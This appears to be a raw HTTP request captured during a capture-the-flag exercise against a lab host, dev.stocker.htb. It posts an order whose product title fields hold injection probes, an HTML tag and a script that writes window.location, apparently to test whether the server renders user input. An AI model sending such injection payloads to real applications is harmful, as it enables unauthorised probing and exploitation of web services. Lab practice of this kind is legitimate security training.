POST /api/order HTTP/1.1
Host: dev.stocker.htb
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://dev.stocker.htb/stock
Content-Type: application/json
Origin: http://dev.stocker.htb
Content-Length: 362
Connection: close
Cookie: connect.sid=s%3Auj46OE5fpPqOIBRECGymxmUjQhi7AxpA.mUUH03mPJmB0hvb%2BTlE3PrhkLQqjSzW6uai3I2wJPms

{"basket":[{"_id":"638f116eeb060210cbd83a91","title":"<h1>Axe<h1>","description":"It's an axe.","image":"axe.jpg","price":12,"currentStock":21,"__v":0,"amount":1},{"_id":"638f116eeb060210cbd83a8f","title":"<script> document.write(window.location) </script>","description":"It's a rubbish bin.","image":"bin.jpg","price":76,"currentStock":15,"__v":0,"amount":1}]}
